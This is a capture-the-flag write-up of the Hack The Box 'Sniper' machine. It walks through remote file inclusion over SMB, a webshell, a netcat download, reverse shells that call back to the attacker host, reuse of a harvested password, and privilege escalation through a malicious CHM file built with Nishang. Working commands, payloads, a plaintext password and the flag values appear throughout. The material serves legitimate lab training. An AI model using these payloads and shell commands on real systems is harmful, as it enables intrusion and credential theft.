As always 1st a nmap scan
root@kali:~/htb/sniper# nmap -A 10.10.10.151 -oN fullscan Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 05:00 EST Nmap scan report for sniper.htb (10.10.10.151) Host is up (0.091s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Sniper Co. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 8h01m34s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-01-27T18:02:27 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 92.15 ms 10.10.14.1 2 94.52 ms sniper.htb (10.10.10.151) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.82 seconds root@kali:~/htb/sniper#
I see that only a few ports are open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate importance, so I keep browsing the web pages. At some point in the blog I see one that accepts a parameter, so I start playing with it. Because it can be vulnerable to injection, I start with local and external file injections. After some ups and downs I find that neither local nor external file recording works via HTTP, so I continue to look to see if anything else is possible. With this Burp research I find this link on RFI based on SMB.
GET /blog/?lang=\WINDOWS\system32\drivers\etc\hosts HTTP/1.1 Host: 10.10.10.151 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
So I reconfigure my SMB server to have a share called "sniper" and see if I can replicate what is in the examples. see also: https://www.puckiestyle.nl/create-a-public-samba-share/
on kali 1st run : systemctl start smbd
After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB Server.
The db.php file contains a username and password, because they can be interesting. I note them for further use and decide it is time to try a decent shell.
powershell Invoke-Webrequest "http://10.10.10.78/nc.exe" -OutFile c:\puckiestyle\nc.exe
So first I use Powershell to transfer netcat. or even simpler with uploading wwwwolfshell
nc.exe 10.10.14.11 9001 -e cmd
Then i call nc.exe , and get a shell on sniper
root@kali:~/htb# rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49684 Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved. C:\puckiestyle>whoami whoami nt authority\iusr C:\puckiestyle>
So I got the shell as iUSR There is only one other regular user in the box named Chris. Maybe the database password is the same as the user password, so I want to try using PowerShell to escalate my rights. After some searching on how to use the password with a PowerShell command, I came across a scriptand decided to adjust it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession
Again, I use PowerShell to transfer the file and then execute it.
powershell Invoke-WebRequest "http://10.10.14.11/getshell.ps1" -OutFile c:\puckiestyle\getshell.ps1
c:\puckiestyle>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>
c:\>cmd /c icacls puckiestyle /c /t /grant everyone:F cmd /c icacls puckiestyle /c /t /grant everyone:F processed file: puckiestyle processed file: puckiestyle\getshell.ps1 processed file: puckiestyle\Microsoft processed file: puckiestyle\nc.exe processed file: puckiestyle\Microsoft\Windows processed file: puckiestyle\Microsoft\Windows\PowerShell processed file: puckiestyle\Microsoft\Windows\PowerShell\ModuleAnalysisCache Successfully processed 7 files; Failed processing 0 files c:\puckiestyle>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\puckiestyle>
[localhost]: PS C:\Users\Chris\Documents> C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 9002 listening on [any] 9002 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49711 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\Chris\Documents> type ../Desktop/user.txt type ../Desktop/user.txt 21f4d0f29fc4dd867500c1ad716cf56e PS C:\Users\Chris\Documents>
Now I have a fully functional shell
it is also possible with WinRM
first upload and run plink.exe
C:\temp>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 ^J.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's rsa2 key fingerprint is: ssh-rsa 2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06 If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) y ^Jlogin as: puck ^Jpuck@10.10.14.8's password: secretpassword ^J Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Jan 27 03:34:27 2020 from 10.10.10.151 Could not chdir to home directory /home/puck: No such file or directory $
and next
PrivEsc
I found this
PS C:\Users\Chris> dir Downloads
dir Downloads
Directory: C:\Users\Chris\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm
A complete HTML help file, so this can be interesting. with netcat I transported this file to my windows box, and this was the content
After more enumeration on disk i found
PS C:\DocsC:\Docs> type note.txt Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it. Regards, Sniper CEO.
So apparently the file instructions.chm is what Chris should prepare for the CEO and then go to this folder., I 1st installed htmlexe.exe from https://www.microsoft.com/en-us/download/details.aspx?id=21138 and then used Nishang : https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1
C:\temp\Powershell -Version 2 PS C:\temp> Import-Module .\Out-CHM.ps1 PS C:\temp> out-chm -Payload "c:\temp\nc 10.10.14.8 5353 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Microsoft HTML Help Compiler 4.74.8702 Compiling c:\temp\doc.chm Compile time: 0 minutes, 0 seconds 2 Topics 4 Local links 4 Internet links 0 Graphics Created c:\temp\doc.chm, 13,428 bytes Compression increased file by 271 bytes. PS C:\temp> copy .\doc.chm c:\python37\project.chm
root@kali:~/htb/sniper# python3 -m http.server 82 Serving HTTP on 0.0.0.0 port 82 (http://0.0.0.0:82/) ... 10.10.10.151 - - [27/Jan/2020 03:58:26] "GET /project.chm HTTP/1.1" 200 -
PS C:\Docs> Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
From the Sniper host I do an Invoke WebRequest again to download the CHM file to the desired folder while a netcat listener waits for the shell to execute
root@kali:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15
Author : Puckiestyle